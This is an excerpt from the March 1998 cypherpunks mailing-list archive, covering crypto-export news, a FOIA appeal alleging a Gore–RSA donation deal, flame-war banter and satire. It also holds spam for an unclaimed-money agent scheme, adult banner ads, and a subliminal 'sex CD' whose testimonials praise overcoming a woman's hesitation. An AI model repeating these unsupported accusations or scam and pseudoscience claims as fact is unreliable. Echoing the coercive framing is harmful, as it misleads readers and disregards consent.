  The software, partially based on a Sun security protocol, was developed
by a Moscow company called Elvis+, a firm started by former Soviet space
scientists in
  which Sun now owns a 10 percent stake. 

  The deal attracted widespread attention because it appeared to give Sun a
way around the Clinton administration's regulation of strong-crypto exports. 

  Sun contended the Elvis+ products fall outside the purview of US
government policy. The administration has been reviewing the deal for nine
months now. 

  Sun executives, who had hoped to put the encryption software on the
market last August, have shelved the plans for the moment, but they remain
hopeful, the
  Journal reported. 

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi








	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 10 Mar 1998 12:00:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Congressbastards getting a clue
Message-ID: <3.0.5.32.19980310120048.007b43b0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



http://allpolitics.com/1998/03/10/ap/mcdermott.lawsuit/

Summary: 

History: Florida couple taped some Congressmen (including Gingrich) talking
on their cellphones.
	  Gives the tape to another Congressman A, who passes it on to the press.
	  Florida couple has been convicted.  

News: Now one of the taped Congressmen is suing the Congressman who leaked
the tape.

When will they learn?  Mathematics >> law


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi








	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@skywriting.com>
Date: Tue, 10 Mar 1998 10:23:53 -0800 (PST)
To: Dave Emery <die@die.com>
Subject: Re: EU plans decryption ban
In-Reply-To: <19980309212946.23723@die.com>
Message-ID: <Pine.LNX.3.96.980310130619.11727A-100000@skywriting.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Mar 1998, Dave Emery wrote:

> 	In the US there is not yet a ban on exchange of information
> because of the potential first amendment issues, but there are (and have
> been since the late 1980s)  felony level bans with $500,000 fines for
> each incident  on the manufacture, assembly, modification, import,
> export, sale and distribution of any device or equipment primarily of
> assistance in the unauthorized decryption of satellite cable programming
> or direct to home satellite.

There is a law in Pennsylvania that bans the distribution of "plans or
instructions" for devices or modifications of devices that can be used for
theft of services. Full text at:

http://moose.erie.net/~italo/sb0655p0687.html

Excerpt:

    10         (2)  sells, possesses, distributes, gives or otherwise
    11     transfers to another[,] or offers, promotes or advertises for
    12     sale [any instrument, apparatus, equipment or device
    13     described in paragraph (1) of this subsection,] any:
    14             (i)  unlawful telecommunication device, or plans or
    15         instructions for making or assembling the same, under
    16         circumstances evidencing an intent to use or employ such
    17         [instrument, apparatus, equipment or] unlawful
    18         telecommunication device, or to allow the same to be used
    19         or employed for a purpose described in paragraph (1) [of
    20         this subsection], or knowing or having reason to believe
    21         that the same is intended to be so used, or that the
    22         aforesaid plans or instructions are intended to be used
    23         for making or assembling such [instrument, apparatus,
    24         equipment or device.] unlawful telecommunication device;
    25         or

At the L0pht we distribute a CD that contains plenty of technical data
for modifying telecommunications equipment and for building your own from
easily obtained parts.  We do not ship our CD to Pennsylvania due to this
law since we cannot be assured that the intent of the purchaser is not to
defraud a telecommunication service provider.  Since information can be
used for good or bad we are pretty sure that some of the purchasers from
Penn will use this information illegally.  This goes against everything
the L0pht stands for but we do not have the resources to fight this in
court.


Weld Pond
weld@l0pht.com
http://www.l0pht.com/~weld





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 10 Mar 1998 19:01:32 -0800 (PST)
To: wire@monkey-boy.com
Subject: do it to them.  they deseve it.
Message-ID: <3505FE5F.6521@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesesday March 10, 1998 3/10/98

E-mail Federico.F.Pena@hq.doe.gov and mail

Federico F. Pena
The Secretary of Energy
United States Department of Energy
Washington, D.C. 20585

Dear Secretary Pena:

Purpose of this letter is to appeal a denial of a Freedom of 
Information Act (FOIA) Request.

I wrote on Tuesday February 17, 1999 15:11

  e-mail and mail

  Ms. Elva Barfield
  Freedom of Information Office
  U. S. Department of Energy
  Albuquerque Operations Office/OIEA
  POB 5400
  Albuquerque, NM 87185-5400
  EBARFIELD@DOEAL.GOV

  Dear Ms. Barfield:

  VP Al Gore is in the crypto business.

    Information SuperSpyWay 
    Al Gore Approved
    Encryption for China
    in Return for
    Campaign Donations
    by Charles R. Smith

  Portions of the above document posted on Internet at 
  http://www.us.net/softwar/ and  http://www.aci.net/kalliste/ 
  states

  1.	Gore charged with encryption policy according to PDD-5 and 
              PRD-27 on April 16, 1993. 

  2.	Government officials represent themselves on Al Gore's behalf for 
        RSA patent purchase negotiations in Feb. 1994. 
  3.	RSA chairman Bidzos meets with Chinese officials at the same 
        time as Ron Brown in Oct. 1995. 

  4.	RSA Chairman Bidzos enters into merger negotiations with Security 
	Dynamics, a company backed by Sanford Robertson, in Nov. 1995. 

  5.	VP Gore calls Sanford Robertson from the White House for a 
        donation in Nov. 1995. 

  6.	Robertson delivers $100,000 donation ($80,000 soft - $20,000 
	directly into the Clinton/Gore campaign) in Jan. 1996. 
  7.	RSA signs deal with China in Feb. 1996. The administration 
	previously prosecuted similar deals but this time does nothing. 
  8.	Justice Dept. approves RSA merger with Security Dynamics in 
	April 1996 for $280 million dollars, netting Sanford Robertson's 
	company a cool $2 million just to write the deal. 

  In 1991 I was in involved with Sandia National Laboratories
  Comprehensive Test Ban Treaty seismic data authenticator.

  At that time Sandia director Tommy A Sellers had assumed 
  responsibility for directorship from Robert Clem.

  Sandia supervisor Tom Wright replaced my supervisor, John Holovka, 
  who was the supervisor for the CTBT seismic data authenticator.

  Wright brought in Ph.D. Steven Goldsmith to supervise me.

  Sellars, Wright, and Goldsmith were new to crypto-type projects.

  Much of this is documented at http://www.jya.com/whp021598.htm.

  This is evidenced by Sellar's attached SEP 24 1991 memorandum,
  which Goldsmith help author, addressed to Dr James J Hearn at 
  the National Security Agency.

  The SEP 24 memorandum contained a number of technical errors.

  I corrected these errors in my attached December 20, 1991 memorandum.

  Department of Energy and it predecessors have a well-documented
  history of not requiring technical expertise for pursuit of interests.

  Stewart Udall, The Myths of August, writes,

      Any cover-up must be implemented and enforced by designated
    agents, and one man emerged in 1953 as the quarterback of the 
    AEC's damage-control effort.  His name was Gordon Dunning.
    Although the personnel charts of the 1950s list him as a low-level 
    "rad-safe" official in the Division of Biology and
Medicine,           
    documents demonstrate that he was clothed with authority to    
    manage and suppress information about the radiation released
    by the testing of nuclear weapons. ...

  About the time Sellers and Sandia Ombudsman gave me a directed
  transfer to break electronic locks for the FBI/ERF [engineering
  research facility], Goldsmith and Wright, certainly with the approval
  of Sellers, placed a contract with RSA Inc [http://www.rsa.com/], 
  I was told.

  Ms Barfield, we think the American public needs to know more about
  RSA's work with Sandia National Laboratories.

  Therefore, Under the provision of the Freedom of Information Act, 
  5 USC 552, I am requesting access to: 

    1 ALL purchase requisitions, including any attached statement of
       work, issued by Sandia National Laboratories, Los Alamos     
       National Laboratories, or DOE/ALOO between January 1, 1991
       and February 17, 1998 to RSA Inc.

    2  Copies of all invoices from RSA Inc received by Sandia National   
        Laboratories, Los Alamos National Laboratories, or DOE/ALOO 
        between January 1, 1991  and February 17, 1998

  If there are any fees for searching for, or copying, the records 
  I have requested, please inform me before you fill the request.

  As you know, the Act permits you to reduce or waive the fees 
  when the release of the information is considered as "primarily 
  benefiting the public."  I believe that this requests fits that 
  category and I therefore ask that you waive any fees.

  Your office agreed to waive fees before.  This request is surely 
  of "public interest."

  December 13, 1994 DOE/AL FOIA officer Gwen Schreiner waived fees
  for the reason,

        "We have considered your request and have determined that
        release of the requested records is in the public interest,
        that disclosure of this information is likely to contribute
        significantly to public understanding of the operations or
        activities of the government, that you or the organization
        you represent have little or no commercial interest in the
        material contained in the records, that you or the
        organization you represent have the qualifications and
        ability to use and disseminate the information, and that the
        records are not currently in the public domain.  A waiver of
        fees is therefore granted."

  This waiver of fees was, undoubtedly, issued as a result of former
  Energy Secretary Hazel O'Leary's Openness initiative.

  Heart of America paid my way to hear Secretary O'Leary's celebrated
  whistleblower speech.

  If all or any part of this request is denied, please cite the 
  specific exemption(s) which you think justifies your refusal to 
  release the information and inform me of your agency's 
  administrative appeal procedures available to me under the law.

  I would appreciate your handling this request as quickly as 
  possible, and I look forward to hearing from you within 20 
  working days, as the law stipulates.

I received no response to the above FOIA. 

Therefore I appeal as a result of non-response.

As you may be aware

      (6)(A) Each agency, upon any request for records made under  
       paragraph (1), (2), or (3) of this subsection, shall--
            (i) determine within ten days \1\ (excepting
        Saturdays, Sundays, and legal public holidays) after
        the receipt of any such request whether to comply with
        such request and shall immediately notify the person
        making such request of such determination and the
        reasons therefor, and of the right of such person to
        appeal to the head of the agency any adverse
        determination; and

And you may also be aware

 
-------------------------------------------------------------------------
      \1\ Under section 12(b) of the Electronic Freedom of Information
  Act Amendments of 1996 (Pub. L. 104-231; 110 Stat. 3054), the
amendment
  made by section 8(b) of such Act striking ``ten days'' and inserting
  ``20 days'' shall take effect on October 3, 1997.
 
-------------------------------------------------------------------------
            (ii) make a determination with respect to any
        appeal within twenty days (excepting Saturdays,
        Sundays, and legal public holidays) after the receipt
        of such appeal. If on appeal the denial of the request
        for records is in whole or in part upheld, the agency
        shall notify the person making such request of the
        provisions for judicial review of that determination
        under paragraph (4) of this subsection

So I expect a response to this appeal within the time allotted to you 
by law.

Much of this unfortunate matter is appearing on Internet.

 http://www.jya.com/whp021598.htm

 http://www.jya.com/cylinked.htm

 Letter from Bill Payne Regarding Cryptography at Sandia
 http://www.aci.net/kalliste/

 Crypto AG: The NSA's Trojan Whore?
 http://caq.com/CAQ/caq63/caq63madsen.html
  
 NSA, Crypto AG, and the Iraq-Iran War
 http://www.aci.net/kalliste/speccoll.htm

 How Secure is America's Nuclear Arsenal?
 http://www.aci.net/kalliste/nukearse.htm

And, of course, we continue to seek settlement.

Sincerely,



William H. Payne 
13015 Calle de Sandias 
Albuquerque, NM 87111






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Mar 1998 18:34:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: GoldMoney
Message-ID: <1.5.4.32.19980311023614.006fd3d8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.goldmoney.com/home.html

Essays on the future of money, electronic, digital and
"GoldMoney," based on US Patent No. 5,671,364

One or so cypherpunks referenced.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 10 Mar 1998 19:03:07 -0800 (PST)
To: "John Young" <cypherpunks@toad.com>
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and  Cryptography
Message-ID: <199803110302.WAA08429@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain


On 3/10/98 7:22 AM, John Young (jya@pipeline.com)  passed this wisdom:

>It worth noting that Microsoft and the Justice Department are 
>perfect twins of technology and law monopolies, using brute force 
>and contracts to get their way, both clothed in self-righteousness 
>and both led by charming weirdos, both totally obsessed with each 
>their own mad view of law and technology in the "public interest."  

 John, would you really refer to Janet Reno as a 'charming weirdo'???? I 
can think of lost of names, epithets, and descriptions, but that surely 
would be far down my list.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Mar 1998 19:43:14 -0800 (PST)
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and  Cryptography
Message-ID: <1.5.4.32.19980311034505.007435fc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian Riley wrote:
>On 3/10/98 7:22 AM, John Young (jya@pipeline.com)  passed this wisdom:

> John, would you really refer to Janet Reno as a 'charming weirdo'???? I 
>can think of lost of names, epithets, and descriptions, but that surely 
>would be far down my list.

Brian, that post was a feeble one-time attempt to write straight prose, 
uninflected, unaccusatory, undiabolical, un-nuts, un-understandable. 

It took days of agony to arrive at empty perfection, to say nothing with 
crystal clear aplomb, foreign policy piquant, transparent balderdash 
cover-up of bald-face lies delivered deadpan grammatically.

I been studying James Rubin's disarmingly weird repartee at the State 
Department press conferences. Today he asked a reporter to define 
"who's got the con"  for foreign policy. (Laughter, the transcript hooted.)

"Charming weirdo" is the Secretary of State's and Rubin's demonic 
auto-epithet for her, emulating homicidal Maggie Thatcher hiding her 
demure will to slaughter.

Swear to god this is the last time I'll try to ape well-mannered civil 
discourse. You got the con: It's too sicko wacko. Back to incoherent 
snarl of ignorant brutes chewing leg off for freedom.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 10 Mar 1998 21:04:01 -0800 (PST)
To: "John Young" <jya@pipeline.com>
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and   Cryptography
Message-ID: <199803110503.AAA22078@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain


On 3/10/98 10:45 PM, John Young (jya@pipeline.com)  passed this wisdom:

>Brian Riley wrote:
>>On 3/10/98 7:22 AM, John Young (jya@pipeline.com)  passed this wisdom:
>
>> John, would you really refer to Janet Reno as a 'charming weirdo'???? I 
>>can think of lost of names, epithets, and descriptions, but that surely 
>>would be far down my list.
>
>Brian, that post was a feeble one-time attempt to write straight prose, 
>uninflected, unaccusatory, undiabolical, un-nuts, un-understandable. 
>
>It took days of agony to arrive at empty perfection, to say nothing with 
>crystal clear aplomb, foreign policy piquant, transparent balderdash 
>cover-up of bald-face lies delivered deadpan grammatically.
>
>I been studying James Rubin's disarmingly weird repartee at the State 
>Department press conferences. Today he asked a reporter to define 
>"who's got the con"  for foreign policy. (Laughter, the transcript hooted.)
>
>"Charming weirdo" is the Secretary of State's and Rubin's demonic 
>auto-epithet for her, emulating homicidal Maggie Thatcher hiding her 
>demure will to slaughter.
>
>Swear to god this is the last time I'll try to ape well-mannered civil 
>discourse. You got the con: It's too sicko wacko. Back to incoherent 
>snarl of ignorant brutes chewing leg off for freedom.

ROFLAAMAIBGFOT37thFOAOBDTADW:  rollin on floor laffing almost as
much as if Bill Gates fell out the 37th floor of an office building due
to a defective window.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Mar 1998 18:40:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: CypherPunks -- The Early Years
Message-ID: <199803110240.DAA27478@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Cordian wrote:
> 
> Might I ask why several prominent Cypherpunks have begun reposting
> "News of the Weird" through sympatico.ca?  Is this some sort of
> Pod thing?

 Close examination of fossil mosquitoes from 40 million
years ago show they look just about the same as that one
dining on your arm.

==============================================
LMBoyd Web Site / U. S. Newspapers / Start Email / Stop Email
http://www.LMBoyd.com/postscript.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Mar 1998 20:42:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Dimentos Tentacles
Message-ID: <199803110442.FAA14173@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


bill.stewart@pobox.com wrote:
> 
> Guy --
> First you and Vulis flame each others, and then
> you start claiming that VZNuri's postings are really Vulis,
> and now you're claiming that postings from Toto's machines
> are really Vulis.  Perhaps *you're* really Vulis?

  Bill Frantz is *really* Vulis.
  Bill Stewart is *really* Toto.

  Both are charter members, along with Bill Clinton and Bill Gates,
of a secret society of people named Bill who plan to form a new
world government and declare the Buffalo Bills to be the real
Superbowl Champions by an act of legislation.

  I am truly amazed that a seemingly intelligent group of individuals
such as the CypherPunks cannot see the blatantly obvious connections
between the Bills and the TMs who are warring for control of our
minds.

--
Eric Michael Cordian 0+
O:.T:.O:.T:. Mathematical Munitions Division
"Forge What Thou Wilt Shall Be The Whole Of The Law"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Wed, 11 Mar 1998 07:10:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Information From The Microsoft Personal Information Center
Message-ID: <042bf3409150b38UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: cypherpunks

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 11 Mar 1998 10:08:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: emailed prez. death threat conviction
Message-ID: <3.0.5.32.19980311100833.007b1e20@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


http://biz.yahoo.com/upi/98/03/11/general_news/usclinton_2.html
Wednesday March 11 5:39 AM EST 

Teen convicted of Clinton e-mail threats

MIDLAND, Mich., March 11 (UPI) _ A 17-year-old high school honors student
faces jail after being convicted of
sending e-mail death threats to President Clinton. 

Heidi Sullivan of Midland, Mich., was sentenced Tuesday to eight days in
jail and two years probation for sending
threats to the White House in January from a computer at Midland High School. 

Midland County Probation Officer Tom Adams says Sullivan could have
received 20 years for threatening the
president, but probably got the reduced sentence because of her family's
history.  [...]


.....................

In other news

			President Might Go Under Knife

                     WASHINGTON (AP) -- Sorry, Bill, it's for your own good.

                     After consulting with his proctologist -- and hearing
an appeal in favor of neutering from
                     actress Doris Day -- First Lady Hillary Clinton has
decided on the procedure for the President.

                     But the reluctant First Lady reserved the right to
change her mind. In announcing
                     Hillary's decision Tuesday, White House spokesman
Barry Toiv said Mrs. Clinton
                     was ``inclined'' to allow the procedure.

                     The National Organization of Women, the nation's
largest women's rights
                     group, applauded the First Lady's decision, saying she
was doing the right thing.

                     ``Neutering or spaying politicians is one of the most
important acts a
                     responsible society can take,'' said Martha Armstrong,
a society vice
                     president. ``It promotes better physical and
behavioral health,
                     and it helps to address the ubiquitous sexual
misconduct crises.''

                     Hillary set no immediate date for putting her husband
under the knife, leaving some to
                     wonder whether the 50 year old former Arkansas
governor has been told of
                     his fate.

                     ``Bill's a little too young to understand,'' Toiv said.

                     Indeed, the President seemed blissfully unaware of any
pending surgery as he played
                     fetch with Buddy, the first dog, on the South Lawn
with a green tennis ball Tuesday.

                     White House press secretary Mike McCurry said today
the procedure was ``not
                     likely anytime soon given the dispositions and pending
indictments.''

                     Toiv said Mrs. Clinton's decision was driven by
concerns for her husband's health. She
                     denied that it was motivated by the encounters Bill
has had with Socks the
                     family cat and various White House staff and interns.

                     Dr. Jacqueline Suarez, a proctologist with the
Alexandria (Va.) Army Hospital,
                     said neutering can help curb politicians' aggression
toward other politicians and tendency
                     to fornicate in unwelcome places.

                     ``Although, if we have people questioning if they
should or shouldn't, those health
                     reasons are good reasons to neuter as well, so we'll
use them as part of the case
                     for neutering,'' Suarez said.

                     Miss Day, president of the Doris Day Humanitarian
League, sent Clinton a letter in
                     December expressing concern that the nation would
suffer if he
                     were left intact. Among them was a risk of impeachment
in addition to 
		     testicular cancer and prostate infections that could lead to
problems with urination.

                     In January, McCurry said there were no plans to neuter
the President, who had moved
                     into the White House in 1993.

                     However, Clinton physician Connie Mariano has now told
Miss Day in a letter
                     that Mrs. Clinton had decided to neuter the president
on the advice of White House advisor
                     James Carville.

                     Armstrong said that politicians need not worry about
losing their procreative abilities.

                     ``Politicians don't have a real concept of identity or
ego.  Its all drive for power.
		      Neutering a politician or justice department official will not
change his basic personality,'' she said. 
		     ``They don't suffer any kind of emotional reaction or identity
crisis when neutered.''

                     Got that, Mr. President?


original at http://www.newsday.com/ap/rnmpwh1z.htm
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

Beat your algorithms into swords and your virtual machines into spears:
let the weak say, I am strong. 








	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 11 Mar 1998 12:46:10 -0800 (PST)
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and   Cryptography
In-Reply-To: <199803110503.AAA22078@mx02.together.net>
Message-ID: <3506E85C.54D9@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Brian B. Riley wrote:
> 
> On 3/10/98 10:45 PM, John Young (jya@pipeline.com)  passed this wisdom:
> >Swear to god this is the last time I'll try to ape well-mannered civil
> >discourse. You got the con: It's too sicko wacko. Back to incoherent
> >snarl of ignorant brutes chewing leg off for freedom.
> 
> ROFLAAMAIBGFOT37thFOAOBDTADW:  rollin on floor laffing almost as
> much as if Bill Gates fell out the 37th floor of an office building due
> to a defective window.

Hey, asshole!
Thanks for telling *everyone* about our plan...
Now I have to contact Blanc Weber and Jeff Sandquist and tell
them we have to come up with a new scheme.
And *this* time, we're not telling *you* about it!

Otot
~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cashout@ibm.net
Date: Wed, 11 Mar 1998 03:51:45 -0800 (PST)
To: TVINFO@prodigy.net
Subject: PLEASE HELP US RETURN OVER $400 BILLION TO ITS RIGHTFUL OWNERS!
Message-ID: <199803111149.LAA17434@out5.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



There is over 400 BILLION DOLLARS IN UNCLAIMED money in North America.

We want to help return this money to its rightful owners! 

To do this we are launching a NATIONAL INFOMERCIAL ON TELEVISION.
 
We are looking for 300 INDEPENDENT AGENTS who will become a part of 
this infomercial.  NO SELLING IS REQUIRED!!!

Each Agent will own an exclusive territory and will receive a 
percentage of the money generated from the television informercial!  

Your involvement will be very finacially rewarding.  

Find out more about the opportunity and how you can get involved.      

Visit our website at http://www.link2web.net/owedmoney/money.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Wed, 11 Mar 1998 12:50:39 -0800 (PST)
To: "Toto" <toto@sk.sympatico.ca>
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and   Cryptography
Message-ID: <199803112050.PAA29056@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain


On 3/11/98 2:39 PM, Toto (toto@sk.sympatico.ca)  passed this wisdom:

>Brian B. Riley wrote:
>> 
>> On 3/10/98 10:45 PM, John Young (jya@pipeline.com)  passed this wisdom:
>> >Swear to god this is the last time I'll try to ape well-mannered civil
>> >discourse. You got the con: It's too sicko wacko. Back to incoherent
>> >snarl of ignorant brutes chewing leg off for freedom.
>> 
>> ROFLAAMAIBGFOT37thFOAOBDTADW:  rollin on floor laffing almost as
>> much as if Bill Gates fell out the 37th floor of an office building due
>> to a defective window.
>
>Hey, asshole!
>Thanks for telling *everyone* about our plan...
>Now I have to contact Blanc Weber and Jeff Sandquist and tell
>them we have to come up with a new scheme.
>And *this* time, we're not telling *you* about it!
>
>Otot
>~~~~

 I guess I now can consider myself a part of the list. I am have 
officially and publically been called an asshole by Toto ... the waitng 
has been killing me!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Wed, 11 Mar 1998 14:26:07 -0800 (PST)
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and Cryptography
In-Reply-To: <199803111530.QAA12576@basement.replay.com>
Message-ID: <19980311172718.42774@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, Mar 11, 1998 at 10:31:09AM -0800, James A. Donald wrote:
>     --
> 
> The Cato institute has done studies on comparative
> remuneration which shows approximately double the salaries,
> accompanied by vastly more security and power.
> 
> At the bottom end, bus drivers and prison guards, this is
> strikingly obvious.  A muni bus driver makes about as much as
> senior engineer in Silicon valley.
> 
	At the risk of an irrelevant and stupid digression from the topic
of the threat, Is this really true ?   The technical people I know who work
for the government seem to get salaries that would be low in industry
for someone with that background.

	And I'd be surprised that bus drivers out in silicon valley were
really making the $60-95K that ordinary senior engineers designing bus
drivers make around here (the NE).  If they are, they are getting lots
more than other municipal employees such as school teachers with masters
degrees. (In fact, I've heard that demand had recently driven salaries
in the valley way up and maybe my numbers for engineers are low,
especially for software engineers.)

	There is, of course, that nasty law that classifies engineers as
exempt professionals but  allows companies to treat them as just cannon
fodder workers stuffed into cubicles and treated with little of the
respect the term professional would suggest - to be forced to work large
amounts of completely uncompensated overtime. Bus drivers (non exempt)
do get paid for every minute they are on the job, and many times work
schedules are deliberately arranged to guarantee significant amounts of
overtime at time and a half, so many bus drivers actually make a
significant multiple of their nominal salary for the same hours
engineers get base salary and no more.

	But I do think that Prof. Froomkin is right that a lot of top
managers and legal types and others in government whose private sector
equivalents get huge salaries do work at a considerable loss.  Salaries
for top of the heap government employees such as judges and managers
of large departments with budgets in the tens or hundreds of millions
rarely get more than $150K, whereas similar people would get much
more in the private sector.

	Of course the job security differences are vast, and government
workers are one of the very few classes of workers left in the economy
who have any actual job security long term at all.

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@sexlink.net
Date: Wed, 11 Mar 1998 20:01:44 -0800 (PST)
To: Webmaster@sexlink.net
Subject: 5000 FREE Banner Ads For Joining
Message-ID: <<3.0.32.19980311142331.webmaster@sexlink.net>
MIME-Version: 1.0
Content-Type: text/plain



THIS MESSAGE IS FOR ADULT WEBMASTERS


JOIN SEX LINK NETWORK BANNER ROTATION PROGRAM 
AND GET 5,000 FREE BANNER ADS!

Become part of one of the most sucessful All adult banner exchange programs available today.

Do you need more hits... well if you sign up within the next 3 days you will receive an automatic
5,000 banner credits just for joining!

Sign up today at http://www.sexlink.net/select.htm  

What do you have to lose... but 5,000 FREE BANNER ADS!



To be removed from this targeted list send e-mail to  remove@sexlink.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Wed, 11 Mar 1998 14:47:00 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: [LEGAL] Crypto as Contraband?
In-Reply-To: <v03007800b129224968f6@[204.254.20.3]>
Message-ID: <19980311174812.30010@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Mar 08, 1998 at 11:41:41PM -0500, Declan McCullagh wrote:

	Qouting worst proposal before congress...
> 
> LEGAL TO USE CRYPTO: "After January 31, 2000, it shall not be
> unlawful to use any encryption product purchased or in use prior to
> such date."
> 
> 

	At the risk of raising yet another stupid and silly issue, does
anybody know how this would apply to crypto (such as PGP) available in
source form ?   Would only binaries produced by compiling the source
before the cutoff date be legal ?  Or would compiling the source under a
new version of the OS or new OS or even new instruction set (ISA-64 on a
Merced for example) merely constitute reasonable use of the existing
source product ? How about mechanical translations of the object to
another environment or instruction set ?   And what level of patches,
bug fixes, or actual changes and improvements to the source would be
legal if it was legal to compile the source and use the resulting binary
after the cutoff ?  


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dina_102@hotmail.com
Date: Wed, 11 Mar 1998 15:38:04 -0800 (PST)
To: dina_102@hotmail.com
Subject: Subliminal Sex
Message-ID: <0000000000.AAA000@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




Do you want to succeed at dating, or you just need a little spark to your
relationship or marriage?

Well here is the Answer for you!

Sensations(r), the new Compact Disc that  uses proven subliminal techniques to
increase your chances of SEXUAL success with the opposite sex.. Simply play it
and watch it work!!!!


What is Subliminal messaging? - "Subliminal perception is the registration of sensory input without
the conscious mind's awareness." 

*Proven Examples* - In 1957, a cinema executive named James Vicary reported to the press that he managed to
increase the sale of popcorn at a theatre by 58% by using subliminal messages embedded in a
film. 
The advertising industry claimed it had developed a whole new methodology which could
influence buying behavior in a predictable and controlled fashion. 

Our Titles - 
The original that started it all! Sensations(r) on CD is a collection of eight songs (45 min.) that sound
"new age." The tempo of each track is upbeat, sexy, romantic, and pleasing. Yet, each song has a
subliminal message built-in, masked by the sound of music. So, the conscious mind has nothing to
analyze or criticize.  CD only $29.95 

Do you want to be a winner?
If YES then call toll free 1-800-409-8302 ext. 1256

*TESTIMONIALS* -

Dear Sensations(r), 

At first, I didn't think subliminal messaging could change my love life. Hell, I didn't think anything could
help me. I tried dating services, blind dates--you name it--to no avail. 

I bought Sensations(r) on CD and played it all day on the stereo in my office cubicle. Valerie, an
executive assistant that I was interested in, started to hang-out by my desk. When I asked her to
lunch, she even said "yes." 

Well, Valerie and I have been dating for over a month, and when I played Sensations(r) during our first
"romantic" evening at my place, I swore I'd never forget what that CD did for me. Thank you very
much! 
                                                                                     Jim Rushak.
                                                                                       Detroit, MI

Dear Sensations(r), 

I'd been seeing this lady for over three weeks and we never got beyond "third base."She had just
come from a relationship and she said she was nervous about sleeping with another man. 

I was patient long enough and really wanted to push things to the "next level." That's when I ordered
Sensations(r).She visited my apartment, and I had it playing on my C.D. player. 

Instead of me making the first move, she was all over me. Needless to say, I think Sensations(r) is a
"home run!" 
                                                                                      Scott Helm.
                                                                                         Lodi, NJ



Dear Sensations(r), 

After spending thousands on new clothes and hundreds on colognes, I finally took the plunge and
